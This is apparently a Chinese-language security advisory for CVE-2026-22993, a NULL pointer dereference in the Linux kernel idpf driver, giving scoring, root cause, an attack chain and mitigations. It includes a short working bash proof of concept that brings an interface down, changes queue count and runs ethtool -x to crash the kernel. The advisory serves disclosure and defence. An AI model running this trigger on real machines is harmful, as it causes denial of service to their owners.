CVE-2026-22993 CVSS 5.5 中危

CVE-2026-22993: Linux内核idpf驱动RSS LUT空指针解引用漏洞

披露日期: 2026-01-23

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-22993

漏洞类型

空指针解引用（NULL Pointer Dereference）

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 idpf驱动

漏洞概述

该漏洞存在于Linux内核的idpf驱动中，在软复位（soft reset）过程中，RSS（接收侧扩展）查找表（LUT）被释放且不会被恢复。当接口处于down状态时，如果用户在复位后立即执行访问RSS LUT的ethtool命令，将导致内核空指针解引用，触发系统崩溃（kernel NULL pointer dereference）。此漏洞需要本地低权限访问，可造成拒绝服务（DoS）。

技术细节

在idpf驱动的软复位流程中，RSS LUT被释放但未正确重建。当执行ethtool -x命令时，idpf_get_rxfh函数尝试访问已释放的LUT指针，导致空指针解引用。攻击者可通过以下步骤触发：ifconfig eth1 down → ethtool -L eth1 combined 20 → ethtool -x eth1。修复方案在复位后根据更新后的队列数设置RSS LUT为默认值（仅当队列数变化且LUT未被用户配置时）。

攻击链分析

STEP 1

步骤1

攻击者将网络接口设置为down状态：ifconfig eth1 down

STEP 2

步骤2

修改接口的队列数量（例如从27改为20）：ethtool -L eth1 combined 20

STEP 3

步骤3

执行ethtool命令显示RSS LUT：ethtool -x eth1，此时会触发NULL指针解引用，导致内核崩溃

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2026-22993 PoC - Trigger NULL pointer dereference in idpf driver

INTERFACE=${1:-eth1}

echo "[+] Triggering CVE-2026-22993: idpf RSS LUT NULL ptr dereference"

# Step 1: Bring interface down
ifconfig $INTERFACE down
echo "[*] Interface $INTERFACE brought down"

# Step 2: Update queue count
ethtool -L $INTERFACE combined 20
echo "[*] Queue count updated to 20"

# Step 3: Display RSS LUT - This triggers the NULL pointer dereference
ethtool -x $INTERFACE
echo "[!] If you see this, the bug may not trigger on this system"

影响范围

Linux内核 < 修复版本（具体版本需查看git.kernel.org的修复提交）

防御指南

临时缓解措施

如果无法立即升级内核，可采取以下缓解措施：1. 监控系统日志中的内核NULL指针解引用错误；2. 限制对ethtool命令的访问；3. 避免在接口down状态下修改队列数；4. 使用SELinux或AppArmor限制网络接口配置权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表